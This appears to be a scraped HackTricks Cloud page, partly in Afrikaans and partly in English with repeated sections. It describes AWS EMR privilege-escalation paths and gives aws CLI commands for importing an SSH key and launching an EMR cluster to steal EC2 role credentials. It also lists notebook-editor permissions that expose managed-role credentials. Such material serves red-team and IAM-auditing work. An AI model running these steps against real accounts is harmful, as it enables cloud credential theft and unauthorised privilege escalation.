AWS - EMR Privesc

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

EMR

Meer inligting oor EMR in:

AWS - EMR Enum

`iam:PassRole`, `elasticmapreduce:RunJobFlow`

'n Aanvaller met hierdie toestemmings kan 'n nuwe EMR-kluster laat loop wat EC2-rolle aanheg en probeer om sy kredensiale te steel. Let daarop dat jy om dit te doen, 'n ssh priv sleutel wat in die rekening ingevoer is, moet ken of een moet invoer, en in staat moet wees om poort 22 in die meesterknoop te open (jy mag in staat wees om dit te doen met die eienskappe EmrManagedMasterSecurityGroup en/of ServiceAccessSecurityGroup binne --ec2-attributes).

# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key


aws emr create-cluster \
--release-label emr-5.15.0 \
--instance-type m4.large \
--instance-count 1 \
--service-role EMR_DefaultRole \
--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc

# Wait 1min and connect via ssh to an EC2 instance of the cluster)
aws emr describe-cluster --cluster-id <id>
# In MasterPublicDnsName you can find the DNS to connect to the master instance
## You cna also get this info listing EC2 instances

Note how an EMR rol is specified in --service-role and a ec2 rol is specified in --ec2-attributes inside InstanceProfile. However, this technique only allows to steal the EC2 rol credentials (as you will connect via ssh) but no the EMR IAM Rol.

Potential Impact: Privesc to the EC2 service rol specified.

`elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole`

With these permissions an attacker can go to the AWS console, create a Notebook and access it to steal the IAM Rol.

Even if you attach an IAM rol to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM rol related.

Potential Impact: Privesc to AWS managed rol arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

`elasticmapreduce:OpenEditorInConsole`

Just with this permission an attacker will be able to access the Jupyter Notebook and steal the IAM rol associated to it. The URL of the notebook is https://<notebook-id>.emrnotebooks-prod.eu-west-1.amazonaws.com/<notebook-id>/lab/

Even if you attach an IAM rol to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM rol related`.

Potential Impact: Privesc to AWS managed rol arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - Elastic Beanstalk Privesc NextAWS - EventBridge Scheduler Privesc

Last updated 3 days ago

EMR

Meer inligting oor EMR in:

AWS - EMR Enum

iam:PassRole, elasticmapreduce:RunJobFlow

# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key


aws emr create-cluster \
--release-label emr-5.15.0 \
--instance-type m4.large \
--instance-count 1 \
--service-role EMR_DefaultRole \
--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc

# Wait 1min and connect via ssh to an EC2 instance of the cluster)
aws emr describe-cluster --cluster-id <id>
# In MasterPublicDnsName you can find the DNS to connect to the master instance
## You cna also get this info listing EC2 instances

Potential Impact: Privesc to the EC2 service rol specified.

elasticmapreduce:CreateEditor, iam:ListRoles, elasticmapreduce:ListClusters, iam:PassRole, elasticmapreduce:DescribeEditor, elasticmapreduce:OpenEditorInConsole

With these permissions an attacker can go to the AWS console, create a Notebook and access it to steal the IAM Rol.

Even if you attach an IAM rol to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM rol related.

Potential Impact: Privesc to AWS managed rol arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

elasticmapreduce:OpenEditorInConsole

Even if you attach an IAM rol to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM rol related`.

Potential Impact: Privesc to AWS managed rol arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile